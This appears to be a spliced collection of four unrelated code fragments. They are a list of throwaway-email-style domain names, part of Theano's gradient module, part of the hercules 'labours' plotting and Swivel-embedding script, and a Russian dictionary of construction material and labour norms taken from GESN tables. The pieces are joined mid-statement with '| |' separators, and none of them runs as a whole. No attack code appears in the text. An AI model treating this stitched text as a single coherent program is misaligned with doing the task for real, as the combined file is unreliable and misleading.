"co1vgedispvpjbpugf.ml",
"co1vgedispvpjbpugf.tk",
"coachfit.ru",
"cobarekyo1.ml",
"cobete.cf",
"cobin2hood.com",
"cocaine.ninja",
"coccx1ajbpsz.cf",
"coccx1ajbpsz.ga",
"coccx1ajbpsz.gq",
"coccx1ajbpsz.ml",
"coccx1ajbpsz.tk",
"cochatz.ga",
"cock.lu",
"cocodani.cf",
"cocovpn.com",
"code-mail.com",
"codyting.com",
"coepoe.cf",
"coepoe.ga",
"coepoe.tk",
"coepoebete.ga",
"coepoekorea.ml",
"coffeelovers.life",
"coffeepancakewafflebacon.com",
"coin-link.com",
"coinbroker.club",
"coincal.org",
"coinlink.club",
"coiosidkry57hg.gq",
"cok.3utilities.com",
| |
"""Driver for gradient calculations."""
__authors__ = "<NAME>, <NAME>, <NAME>"
__copyright__ = "(c) 2011, Universite de Montreal"
__license__ = "3-clause BSD License"
__contact__ = "theano-dev <<EMAIL>>"
__docformat__ = "restructuredtext en"
import __builtin__
import logging
import warnings
_logger = logging.getLogger('theano.gradient')
import sys
import numpy # for numeric_grad
import theano
from theano.raise_op import Raise
from theano import gof
from theano.gof import Variable
from theano.gof.python25 import all
import theano.gof.utils
_msg_retType = 'op.grad(...) returned a non-list'
_msg_badlen = 'op.grad(...) returned wrong number of gradients'
def format_as(use_list, use_tuple, outputs):
"""
Formats the outputs according to the flags `use_list` and `use_tuple`.
If `use_list` is True, `outputs` is returned as a list (if `outputs`
is not a list or a tuple then it is converted in a one element list).
If `use_tuple` is True, `outputs` is returned as a tuple (if `outputs`
is not a list or a tuple then it is converted into a one element tuple).
Otherwise (if both flags are false), `outputs` is returned.
"""
assert not (use_list and use_tuple), \
"Both flags cannot be simultaneously True"
if (use_list or use_tuple) and not isinstance(outputs, (list, tuple)):
if use_list:
return [outputs]
else:
return (outputs,)
elif not (use_list or use_tuple) and isinstance(outputs, (list, tuple)):
assert len(outputs) == 1, \
"Wrong arguments. Expected a one element list"
return outputs[0]
elif use_list or use_tuple:
if use_list:
return list(outputs)
else:
return tuple(outputs)
else:
return outputs
def grad_sources_inputs(sources, graph_inputs, warn_type=True):
"""
A gradient source is a pair (``v``, ``g_v``), in which ``v`` is
a `Variable`, and ``g_v`` is a `Variable` that is a gradient wrt
``v``. More specifically, ``g_v`` is the gradient of an external
scalar cost, ``cost`` (that is not explicitly used), wrt ``v``.
This function traverses the graph backward from the ``r`` sources,
calling ``op.grad(...)`` for all ops with some non-None gradient
on an output, to compute gradients of ``cost`` wrt intermediate
variables and ``graph_inputs``.
The ``op.grad(...)`` functions are called like this:
.. code-block:: python
op.grad(op.inputs[:], [total_gradient(v) for v in op.outputs])
This call to ``op.grad`` should return a list or tuple: one symbolic
gradient per input. These gradients represent the gradients of
the same implicit ``cost`` mentionned above, wrt ``op.inputs``. Note
that this is **not** the same as the gradient of ``op.outputs`` wrt
``op.inputs``.
If ``op`` has a single input, then ``op.grad`` should return a list
or tuple of length 1.
For each input wrt to which ``op`` is not differentiable, it should
return ``None`` instead of a `Variable` instance.
If a source ``r`` receives a gradient from another source ``r2``,
then the effective gradient on ``r`` is the sum of both gradients.
:type sources: list of pairs of Variable: (v, gradient-on-v) to
initialize the total_gradient dictionary
:param sources: gradients to back-propagate using chain rule
:type graph_inputs: list of Variable
:param graph_inputs: variables considered to be constant
(do not backpropagate through them)
:type warn_type: bool
:param warn_type: True will trigger warnings via the logging module when
the gradient on an expression has a different type than the original
expression
:rtype: dictionary whose keys and values are of type Variable
:return: mapping from each Variable encountered in the backward
traversal to the gradient with respect to that Variable.
It is assumed that there is some objective J shared between all members of
sources, so that for each v, gradient-on-v is the gradient of J with
respect to v
"""
gmap = {}
for (r, g_r) in sources:
if not hasattr(r, 'type'):
raise TypeError('sources must be Variables', r)
if g_r is not None:
if r in gmap:
gmap[r] = gmap[r] + g_r
else:
gmap[r] = g_r
graph_outputs = gof.utils.uniq([r for r, g in sources])
if graph_inputs is None:
graph_inputs = gof.graph.inputs(graph_outputs)
for node in gof.graph.io_toposort(graph_inputs,
graph_outputs).__reversed__():
g_outputs = [gmap.get(o, None) for o in node.outputs]
#if all output gradients are None, continue
if all(map(lambda x: x is None, g_outputs)): continue
output_arg = g_outputs
input_arg = node.inputs
# Each Op's grad function requires inputs and output_grads
# If the Op destroys any input, but the grad expression uses it,
# then chances are the resulting graph will have a dependency
# cycle. We avoid this cycle by passing (symbolic) copies of
# each destroyed input.
try:
dinputs = [node.inputs[x[0]] for x in node.op.destroy_map.values()]
except AttributeError:
dinputs = []
new_input_arg = []
for input in input_arg:
if input in dinputs and hasattr(input, 'copy'):
new_input_arg.append(input.copy())
else:
new_input_arg.append(input)
input_arg = new_input_arg
#note that this function is not in a try-except block
# the rationale:
# If the op implements grad, then any exception should be passed to
# the caller
# If the op doesn't implement grad, this entire function should fail.
# Other possibilities:
# * return a partial back-prop
#
op_grad = node.op.grad(input_arg, output_arg)
if not isinstance(op_grad, (list, tuple)):
raise ValueError(_msg_retType, node.op)
g_inputs = op_grad
assert isinstance(g_inputs, (list, tuple))
if len(g_inputs) != len(node.inputs):
raise ValueError(_msg_badlen,
node.op,
len(g_inputs),
len(node.inputs))
for ii, (r, g_r) in enumerate(zip(node.inputs, g_inputs)):
if warn_type:
if g_r and (getattr(r, 'type', 0) != getattr(g_r, 'type', 1)):
r_type = getattr(r, 'type', None)
g_r_type = getattr(g_r, 'type', None)
_logger.warning('%s.grad returned a different type (%s) '
'for input %i of type (%s)',
node.op, g_r_type, ii, r_type)
if g_r and len(sources) == 1 and sources[0][0].name and r.name:
g_r.name = "(d%s/d%s)" % (sources[0][0].name, r.name)
if g_r is not None:
assert r is not None
if r in gmap:
gmap[r] = gmap[r] + g_r
else:
gmap[r] = g_r
return gmap
def unimplemented_grad(op, x_pos, x):
"""
DO NOT USE. Remove this function after all usage of it has been
removed from theano.
Return an un-computable symbolic variable of type `x.type`.
If any function tries to compute this un-computable variable, an exception
(NotImplementedError) will be raised indicating that the gradient on the
`x_pos`'th input of `op` has not been implemented.
"""
msg = '%s.grad not implemented for input %i' % (op, x_pos)
return Raise(msg=msg)(x)
########################
# R Operator
########################
def Rop(f, wrt, eval_points):
"""
Computes the R operation on `f` wrt to `wrt` evaluated at points given
in `eval_points`. Mathematically this stands for the jacobian of `f` wrt
to `wrt` right muliplied by the eval points.
:type f: Variable or list of Variables
`f` stands for the output of the computational graph to which you
want to apply the R operator
:type wrt: Variable or list of `Variables`s
variables for which you compute the R operator of the expression
described by `f`
:type eval_points: Variable or list of Variables
evalutation points for each of the variables in `wrt`
:rtype: Variable or list/tuple of Variables depending on type of f
:return: symbolic expression such that
R_op[i] = sum_j ( d f[i] / d wrt[j]) eval_point[j]
where the indices in that expression are magic multidimensional
indices that specify both the position within a list and all
coordinates of the tensor element in the last.
If `wrt` is a list/tuple, then return a list/tuple with the results.
"""
from theano.tensor import as_tensor_variable
using_list = isinstance(f, list)
using_tuple = isinstance(f, tuple)
if not isinstance(wrt, (list, tuple)):
wrt = [wrt]
if not isinstance(eval_points, (list, tuple)):
eval_points = [eval_points]
if not isinstance(f, (list, tuple)):
f = [f]
assert len(wrt) == len(eval_points)
# Check that each element of wrt corresponds to an element
# of eval_points with the same dimensionality.
for pack in enumerate(zip(wrt, eval_points)):
i = pack[0]
wrt_elem, eval_point = pack[1]
if not isinstance(wrt_elem, gof.Variable):
wrt_elem = as_tensor_variable(wrt_elem)
if not isinstance(eval_point, gof.Variable):
eval_point = as_tensor_variable(eval_point)
try:
if wrt_elem.type.ndim != eval_point.type.ndim:
raise ValueError('Element ' +
str(i) +
' of wrt/eval_point have mismatched ' +
'dimensionality: ' +
str(wrt_elem.type.ndim) +
' versus ' +
str(eval_point.type.ndim))
except AttributeError:
# wrt_elem and eval_point don't always have ndim like random type
# Tensor, Sparse and CudaNdArray have the ndim attribute
pass
seen_nodes = {}
def _traverse(node):
""" TODO: writeme """
if node is None:
return None
else:
op = node.op
inputs = node.inputs
# Compute the evaluation points corresponding to each of the
# inputs of the node
local_eval_points = []
for inp in inputs:
if inp in | |
args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
s = 4 + matrix.shape[1] * 0.3
fig = pyplot.figure(figsize=(s, s))
ax = fig.add_subplot(111)
ax.xaxis.set_label_position("top")
ax.matshow(matrix, cmap=pyplot.cm.OrRd)
ax.set_xticks(numpy.arange(0, matrix.shape[1]))
ax.set_yticks(numpy.arange(0, matrix.shape[0]))
ax.set_yticklabels(people, va="center")
ax.set_xticks(numpy.arange(0.5, matrix.shape[1] + 0.5), minor=True)
ax.set_xticklabels(["Unidentified"] + people, rotation=45, ha="left",
va="bottom", rotation_mode="anchor")
ax.set_yticks(numpy.arange(0.5, matrix.shape[0] + 0.5), minor=True)
ax.grid(which="minor")
apply_plot_style(fig, ax, None, args.style, args.text_size, args.size)
if not args.output:
pos1 = ax.get_position()
pos2 = (pos1.x0 + 0.15, pos1.y0 - 0.1, pos1.width * 0.9, pos1.height * 0.9)
ax.set_position(pos2)
if args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
title = "%s %d developers overwrite" % (repo, matrix.shape[0])
if args.output:
# FIXME(vmarkovtsev): otherwise the title is screwed in savefig()
title = ""
deploy_plot(title, output, args.style)
def plot_ownership(args, repo, names, people, date_range, last):
if args.output and args.output.endswith(".json"):
data = locals().copy()
del data["args"]
data["type"] = "ownership"
if args.mode == "all":
output = get_plot_path(args.output, "people")
else:
output = args.output
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
pyplot.stackplot(date_range, people, labels=names)
pyplot.xlim(date_range[0], last)
if args.relative:
for i in range(people.shape[1]):
people[:, i] /= people[:, i].sum()
pyplot.ylim(0, 1)
legend_loc = 3
else:
legend_loc = 2
legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
if args.mode == "all":
output = get_plot_path(args.output, "people")
else:
output = args.output
deploy_plot("%s code ownership through time" % repo, output, args.style)
IDEAL_SHARD_SIZE = 4096
def train_embeddings(index, matrix, tmpdir, shard_size=IDEAL_SHARD_SIZE):
try:
from . import swivel
except (SystemError, ImportError):
import swivel
import tensorflow as tf
assert matrix.shape[0] == matrix.shape[1]
assert len(index) <= matrix.shape[0]
outlier_threshold = numpy.percentile(matrix.data, 99)
matrix.data[matrix.data > outlier_threshold] = outlier_threshold
nshards = len(index) // shard_size
if nshards * shard_size < len(index):
nshards += 1
shard_size = len(index) // nshards
nshards = len(index) // shard_size
remainder = len(index) - nshards * shard_size
if remainder > 0:
lengths = matrix.indptr[1:] - matrix.indptr[:-1]
filtered = sorted(numpy.argsort(lengths)[remainder:])
else:
filtered = list(range(len(index)))
if len(filtered) < matrix.shape[0]:
print("Truncating the sparse matrix...")
matrix = matrix[filtered, :][:, filtered]
meta_index = []
for i, j in enumerate(filtered):
meta_index.append((index[j], matrix[i, i]))
index = [mi[0] for mi in meta_index]
with tempfile.TemporaryDirectory(prefix="hercules_labours_", dir=tmpdir or None) as tmproot:
print("Writing Swivel metadata...")
vocabulary = "\n".join(index)
with open(os.path.join(tmproot, "row_vocab.txt"), "w") as out:
out.write(vocabulary)
with open(os.path.join(tmproot, "col_vocab.txt"), "w") as out:
out.write(vocabulary)
del vocabulary
bool_sums = matrix.indptr[1:] - matrix.indptr[:-1]
bool_sums_str = "\n".join(map(str, bool_sums.tolist()))
with open(os.path.join(tmproot, "row_sums.txt"), "w") as out:
out.write(bool_sums_str)
with open(os.path.join(tmproot, "col_sums.txt"), "w") as out:
out.write(bool_sums_str)
del bool_sums_str
reorder = numpy.argsort(-bool_sums)
print("Writing Swivel shards...")
for row in range(nshards):
for col in range(nshards):
def _int64s(xs):
return tf.train.Feature(
int64_list=tf.train.Int64List(value=list(xs)))
def _floats(xs):
return tf.train.Feature(
float_list=tf.train.FloatList(value=list(xs)))
indices_row = reorder[row::nshards]
indices_col = reorder[col::nshards]
shard = matrix[indices_row][:, indices_col].tocoo()
example = tf.train.Example(features=tf.train.Features(feature={
"global_row": _int64s(indices_row),
"global_col": _int64s(indices_col),
"sparse_local_row": _int64s(shard.row),
"sparse_local_col": _int64s(shard.col),
"sparse_value": _floats(shard.data)}))
with open(os.path.join(tmproot, "shard-%03d-%03d.pb" % (row, col)), "wb") as out:
out.write(example.SerializeToString())
print("Training Swivel model...")
swivel.FLAGS.submatrix_rows = shard_size
swivel.FLAGS.submatrix_cols = shard_size
if len(meta_index) <= IDEAL_SHARD_SIZE / 16:
embedding_size = 50
num_epochs = 100000
elif len(meta_index) <= IDEAL_SHARD_SIZE:
embedding_size = 50
num_epochs = 50000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 2:
embedding_size = 60
num_epochs = 10000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 4:
embedding_size = 70
num_epochs = 8000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 10:
embedding_size = 80
num_epochs = 5000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 25:
embedding_size = 100
num_epochs = 1000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 100:
embedding_size = 200
num_epochs = 600
else:
embedding_size = 300
num_epochs = 300
if os.getenv("CI"):
# Travis, AppVeyor etc. during the integration tests
num_epochs /= 10
swivel.FLAGS.embedding_size = embedding_size
swivel.FLAGS.input_base_path = tmproot
swivel.FLAGS.output_base_path = tmproot
swivel.FLAGS.loss_multiplier = 1.0 / shard_size
swivel.FLAGS.num_epochs = num_epochs
# Tensorflow 1.5 parses sys.argv unconditionally *applause*
argv_backup = sys.argv[1:]
del sys.argv[1:]
swivel.main(None)
sys.argv.extend(argv_backup)
print("Reading Swivel embeddings...")
embeddings = []
with open(os.path.join(tmproot, "row_embedding.tsv")) as frow:
with open(os.path.join(tmproot, "col_embedding.tsv")) as fcol:
for i, (lrow, lcol) in enumerate(zip(frow, fcol)):
prow, pcol = (l.split("\t", 1) for l in (lrow, lcol))
assert prow[0] == pcol[0]
erow, ecol = \
(numpy.fromstring(p[1], dtype=numpy.float32, sep="\t")
for p in (prow, pcol))
embeddings.append((erow + ecol) / 2)
return meta_index, embeddings
class CORSWebServer(object):
def __init__(self):
self.thread = threading.Thread(target=self.serve)
self.server = None
def serve(self):
outer = self
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
except ImportError: # Python 2
from BaseHTTPServer import HTTPServer, test
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ClojureServer(HTTPServer):
def __init__(self, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
outer.server = self
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPRequestHandler.end_headers(self)
test(CORSRequestHandler, ClojureServer)
def start(self):
self.thread.start()
def stop(self):
if self.running:
self.server.shutdown()
self.thread.join()
@property
def running(self):
return self.server is not None
web_server = CORSWebServer()
def write_embeddings(name, output, run_server, index, embeddings):
print("Writing Tensorflow Projector files...")
if not output:
output = "couples_" + name
if output.endswith(".json"):
output = os.path.join(output[:-5], "couples")
run_server = False
metaf = "%s_%s_meta.tsv" % (output, name)
with open(metaf, "w") as fout:
fout.write("name\tcommits\n")
for pair in index:
fout.write("%s\t%s\n" % pair)
print("Wrote", metaf)
dataf = "%s_%s_data.tsv" % (output, name)
with open(dataf, "w") as fout:
for vec in embeddings:
fout.write("\t".join(str(v) for v in vec))
fout.write("\n")
print("Wrote", dataf)
jsonf = "%s_%s.json" % (output, name)
with open(jsonf, "w") as fout:
fout.write("""{
"embeddings": [
{
"tensorName": "%s %s coupling",
"tensorShape": [%s, %s],
"tensorPath": "http://0.0.0.0:8000/%s",
"metadataPath": "http://0.0.0.0:8000/%s"
}
]
}
""" % (output, name, len(embeddings), len(embeddings[0]), dataf, metaf))
print("Wrote %s" % jsonf)
if run_server and not web_server.running:
web_server.start()
url = "http://projector.tensorflow.org/?config=http://0.0.0.0:8000/" + jsonf
print(url)
if run_server:
if shutil.which("xdg-open") is not None:
os.system("xdg-open " + url)
else:
browser = os.getenv("BROWSER", "")
if browser:
os.system(browser + " " + url)
else:
print("\t" + url)
def show_shotness_stats(data):
top = sorted(((r.counters[i], i) for i, r in enumerate(data)), reverse=True)
for count, i in top:
r = data[i]
print("%8d %s:%s [%s]" % (count, r.file, r.name, r.internal_role))
def show_sentiment_stats(args, name, resample, start, data):
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
start = datetime.fromtimestamp(start)
data = sorted(data.items())
xdates = [start + timedelta(days=d[0]) for d in data]
xpos = []
ypos = []
xneg = []
yneg = []
for x, (_, y) in zip(xdates, data):
y = 0.5 - y.Value
if y > 0:
xpos.append(x)
ypos.append(y)
else:
xneg.append(x)
yneg.append(y)
pyplot.bar(xpos, ypos, color="g", label="Positive")
pyplot.bar(xneg, yneg, color="r", label="Negative")
legend = pyplot.legend(loc=1, fontsize=args.text_size)
pyplot.ylabel("Lines of code")
pyplot.xlabel("Time")
apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
pyplot.xlim(xdates[0], xdates[-1])
locator = pyplot.gca().xaxis.get_major_locator()
# set the optimal xticks locator
if "M" not in resample:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(locator)
if locs[0] < pyplot.xlim()[0]:
del locs[0]
endindex = -1
if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
locs.append(pyplot.xlim()[1])
endindex = len(locs) - 1
startindex = -1
if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
locs.append(pyplot.xlim()[0])
startindex = len(locs) - 1
pyplot.gca().set_xticks(locs)
# hacking time!
labels = pyplot.gca().get_xticklabels()
if startindex >= 0:
labels[startindex].set_text(xdates[0].date())
labels[startindex].set_text = lambda _: None
labels[startindex].set_rotation(30)
labels[startindex].set_ha("right")
if endindex >= 0:
labels[endindex].set_text(xdates[-1].date())
labels[endindex].set_text = lambda _: None
labels[endindex].set_rotation(30)
labels[endindex].set_ha("right")
overall_pos = sum(2 * (0.5 - d[1].Value) for d in data if d[1].Value < 0.5)
overall_neg = sum(2 * (d[1].Value - 0.5) for d in data if d[1].Value > 0.5)
title = "%s sentiment +%.1f -%.1f δ=%.1f" % (
name, overall_pos, overall_neg, overall_pos - overall_neg)
deploy_plot(title, args.output, args.style)
def main():
args = parse_args()
reader = read_input(args)
header = reader.get_header()
name = reader.get_name()
burndown_warning = "Burndown stats were not collected. Re-run hercules with --burndown."
burndown_files_warning = \
"Burndown stats for files were not collected. Re-run hercules with " \
"--burndown --burndown-files."
burndown_people_warning = \
"Burndown stats for people were not collected. Re-run hercules with " \
"--burndown --burndown-people."
couples_warning = "Coupling stats were not collected. Re-run hercules with --couples."
shotness_warning = "Structural hotness stats were not collected. Re-run hercules with " \
"--shotness. Also check --languages - the output may be empty."
sentiment_warning = "Sentiment stats were not collected. Re-run hercules with --sentiment."
def run_times():
rt = reader.get_run_times()
import pandas
series = pandas.to_timedelta(pandas.Series(rt).sort_values(ascending=False), unit="s")
df | |
140-270 мм (кубометр)':1.77,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':1.09 + 1.34,
'Кирпич керамический (штука)':88,
'Паста антисептическая строительная (килограмм)':3.9,
'Использование крана на автомобильном ходу 10 тонн (часов)':0.38,
'Использование передвижного битумного котла на 400 литров (часов)':0.9,
'Использование дрели электрической (часов)':11.6,
'Использование рубанка электрического (часов)':1.6,
'Использование пилы цепной электрической (часов)':0.62,
'Использование бортового автомобиля до 5 тонн (часов)':0.57,
}
metadict_model['Устройство калиток (100 квадратных метров)'] = {
# http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i674023
# Таблица ГЭСН 10-01-071 Устройство калиток
# 01. Заготовка, антисептирование и установка деревянных столбов в готовые ямы
# на подкладки из кирпича с последующей обратной засыпкой.
# 02. Изготовление элементов калиток с постановкой поковок и навеской их.
# Измеритель: 100 м2 калиток
# Устройство калиток (с установкой столбов):
# Решетчатых высотой до 1,2 м
# 10-01-071-02 (рабочие): 369 нормо-часов
# 10-01-071-02 (машинисты): 2.9 нормо-часа
'_-Работа строительной бригады (нормо-часов)':372,
'Смола каменноугольная для дорожного строительства (килограмм)':83,
'Поковки из квадратных заготовок 1.8 кг (килограмм)':100,
'Болты с гайками и шайбами строительные (килограмм)':100,
'Лесоматериалы круглые 140-270 мм (кубометр)':4.16,
'Гвозди строительные (килограмм)':3.5,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':3.41 + 0.6,
'Доски обрезные хвойные 35x100x6000 мм (кубометр)':1.84,
'Паста антисептическая строительная (килограмм)':10.5,
'Кирпич керамический (штука)':360,
'Использование крана на автомобильном ходу 10 тонн (часов)':1.16,
'Использование передвижного битумного котла на 400 литров (часов)':2.8,
'Использование дрели электрической (часов)':40.1,
'Использование рубанка электрического (часов)':3.7,
'Использование пилы цепной электрической (часов)':1.7,
'Использование бортового автомобиля до 5 тонн (часов)':1.73,
}
metadict_model['Установка дверных блоков (100 квадратных метров)'] = {
# http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i423740
# Таблица ГЭСН 10-01-040 Заполнение наружных и внутренних дверных проемов
# отдельными элементами в деревянных рубленых стенах
# 01. Установка коробок с прибивкой вертикальных брусков для образования гребня,
# выборкой паза в торцах брусьев (бревен).
# 02. Пригонка и навеска дверных полотен с установкой приборов.
# 03. Установка наличников.
# Измеритель: 100 м2 проемов
# Заполнение наружных и внутренних дверных проемов отдельными элементами
# в деревянных рубленых стенах, площадь проема:
# "10-01-040-1 (рабочие)": 442 нормо-часов
'_-Работа строительной бригады (нормо-часов)':442,
'Гвозди строительные (килограмм)':0.3,
'Ерши металлические (килограмм)':25,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.51,
'Доски обрезные хвойные 25x100x6000 мм (кубометр)':0.08,
'Наличники (метр)':660,
'Коробки дверные (метр)':315,
'Использование бортового автомобиля до 5 тонн (часов)':4.47,
#'Полотна для блоков дверных (квадратный метр)':85,
}
metadict_model['Установка оконных блоков (каркас) (100 квадратных метров)'] = {
# Таблица ГЭСН 10-01-027 Установка в жилых и общественных зданиях блоков оконных с переплетами:
# http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i255538
# 01. Установка блоков.
# 02. Конопатка коробок.
# 03. Установка подоконных досок, наличников.
# 04. Установка накладных приборов.
# Измеритель: 100 м2 проемов
# Установка в жилых и общественных зданиях блоков оконных с переплетами:
# "10-01-027-11" (рабочие): 260 нормо-часов
'_-Работа строительной бригады (нормо-часов)':260,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.32,
'Пакля пропитаная (килограмм)':260,
'Гвозди строительные (килограмм)':16,
'Шурупы строительные (килограмм)':11.4,
'Паста антисептическая строительная (килограмм)':2.2,
'Доски подоконные деревянные (метр)':83,
'Вода для строительства (кубометр)':0.4,
'Наличники (метр)':587,
'Использование шуруповёрта (часов)':8.55,
'Использование бортового автомобиля до 5 тонн (часов)':4.16,
#'Блоки оконные (квадратный метр)':100,
}
metadict_model['Установка оконных блоков (сруб) (100 квадратных метров)'] = {
# Таблица ГЭСН 10-01-027 Установка в жилых и общественных зданиях блоков оконных с переплетами:
# http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i255538
# 01. Установка блоков.
# 02. Прибивка к коробкам вертикальных брусков для образования гребня
# и выборка паза в торцах брусьев (бревен).
# 03. Конопатка коробок.
# 04. Установка накладных приборов
# Измеритель: 100 м2 проемов
# "10-01-027-07" (рабочие): 470 нормо-часов
'_-Работа строительной бригады (нормо-часов)':470,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.63,
'Пакля пропитаная (килограмм)':260,
'Гвозди строительные (килограмм)':16,
'Шурупы строительные (килограмм)':11.4,
'Паста антисептическая строительная (килограмм)':2.2,
'Доски подоконные деревянные (метр)':83,
'Вода для строительства (кубометр)':2,
'Наличники (метр)':587,
'Использование шуруповёрта (часов)':6.55,
'Использование бортового автомобиля до 5 тонн (часов)':4.28,
#'Блоки оконные (квадратный метр)':100,
}
metadict_model['Установка мебели (100 штук)'] = {
# Таблица ГЭСН 10-01-059 Установка штучных изделий
# http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i586522
# Установка столов, шкафов под мойки, холодильных шкафов и др.
# 01. Установка штучных изделий с креплением, уплотнением швов примыкания раскладками.
# Измеритель: 100 шт. изделий
# "10-01-059-01" (рабочие): 75.15 нормо-часов
# "10-01-059-01" (машинисты): 2.3 нормо-часов
'_-Работа строительной бригады (нормо-часов)':78,
'Гвозди строительные (килограмм)':12,
'Подковки из квадратных заготовок (килограмм)':35,
'Штапик деревянный 19x19 мм (метров)':400,
'Использование подъёмника одномачтового 500 кг (часов)':1.73,
'Использование бортового автомобиля до 5 тонн (часов)':2.47,
}
metadict_model['Простая окраска масляными составами (100 квадратных метров)'] = {
# Таблица ГЭСН 15-04-024 Простая окраска масляными составами
# http://www.norm-load.ru/SNiP/Data1/54/54295/index.htm#i1635472
# Простая окраска масляными составами по дереву:
# 15-04-024-01 стен
# Измеритель: 100 м2 окрашиваемой поверхности
# "15-04-024-01" (рабочие): 28 нормо-часа
'_-Работа маляра (нормо-часов)':28,
'Олифа комбинированная марки К-2 (килограмм)':8.4,
'Шпатлёвка масляно-клеевая (килограмм)':5,
'Краски масляные (килограмм)':27,
'Использование подъёмника одномачтового 500 кг (часов)':0.01,
'Использование бортового автомобиля до 5 тонн (часов)':0.05,
}
metadict_model['Улучшенная окраска масляными составами (100 квадратных метров)'] = {
# Таблица ГЭСН 15-04-025 Улучшенная окраска масляными составами
# http://www.norm-load.ru/SNiP/Data1/54/54295/index.htm#i1656646
# Улучшенная окраска масляными составами по дереву:
# 15-04-025-01 стен
# Измеритель: 100 м2 окрашиваемой поверхности
# "15-04-025-01" (рабочие): 58.52 нормо-часа
'_-Работа маляра (нормо-часов)':58,
'Олифа для улучшенной окраски (килограмм)':9.1,
'Шпатлёвка масляно-клеевая (килограмм)':38,
'Краски масляные (килограмм)':26,
'Использование подъёмника одномачтового 500 кг (часов)':0.01,
'Использование бортового автомобиля до 5 тонн (часов)':0.05,
}
metadict_model['Улучшенная штукатурка цементно-известковым раствором (100 квадратных метров)'] = {
# Таблица ГЭСН 15-02-001 Улучшенная штукатурка цементно-известковым раствором по камню
# http://www.norm-load.ru/SNiP/Data1/56/56039/index.htm#i707554
# 01. Подготовка поверхности.
# 02. Нанесение раствора на поверхности с разравниванием и затиркой накрывного слоя.
# 03. Вытягивание тяг с разделкой углов.
# 04. Уход за штукатуркой.
# Измеритель: 100 м2 оштукатуриваемой поверхности
# Улучшенная штукатурка фасадов цементно-известковым раствором по камню:
# 15-02-001-01 стен
# "15-02-001-01" (рабочие): 70.88 нормо-часа
# "15-02-001-01" (машинисты): 2.78 нормо-часа
'_-Работа штукатура (нормо-часов)':75,
'Раствор отделочный цементно-известковый (кубометр)':1.89,
'Вода для строительства (кубометр)':0.35,
'Использование растворонасоса 3 кубометра/час (часов)':2.78,
'Использование лебёдки электрической на 1.25 тонн (часов)':0.9,
}
metadict_model['Облицовка керамическими плитками (100 квадратных метров)'] = {
# Таблица ГЭСН 15-01-019 Гладкая облицовка стен, столбов, пилястр и откосов
# http://www.norm-load.ru/SNiP/Data1/56/56039/index.htm#i226171
# 01. Набивка по деревянным поверхностям проволочной сетки
# и устройство подготовительного слоя с нарезкой борозд.
# 02. Сортировка плиток.
# 03. Облицовка поверхностей.
# 04. Перерубка плиток и подточка кромок.
# 05. Заполнение швов.
# 06. Распудривание облицованных поверхностей.
# 07. Очистка и промывка поверхности облицовки.
# Гладкая облицовка стен, столбов, пилястр и откосов
# (без карнизных, плинтусных и угловых плиток)
# с установкой плиток туалетного гарнитура на клее из сухих смесей:
# Измеритель: 100 м2 поверхности облицовки
# 15-01-019-08 по дереву
# "15-04-025-01" (рабочие): 204.07 нормо-часа
'_-Работа каменщика (нормо-часов)':206,
'Сетка проволочная тканая с ячейками №5 (квадратный метр)':105,
'Плитки керамические рядковые (квадратный метр)':99,
'Клей для облицовочных работ (килограмм)':375,
'Смесь сухая для заделки швов (килограмм)':50,
'Раствор отделочный цементно-известковый (кубометр)':1.2,
'Вода для строительства (кубометр)':0.93,
'Использование автопогрузчика 5 тонн (часов)':0.05,
'Использование подъёмника одномачтового 500 кг (часов)':0.81,
}
metadict_model['Прокладка 400-мм водопровода (1000 метров)'] = {
# Таблица ГЭСН 22-01-006 Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом
# http://www.norm-load.ru/SNiP/Data1/54/54313/index.htm#i127040
# 01. Опускание и укладка труб.
# 02. Заделка раструбов смоляной прядью и асбестоцементным раствором.
# 03. Гидравлическое испытание трубопровода с устройством и разборкой временных упоров.
# Измеритель: 1 км трубопровода
# Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом диаметром:
# 22-01-006-10 400 мм
# "22-01-006-10" (рабочие): 802 нормо-часа
# "22-01-006-10" (машинисты): 191.59 нормо-часа
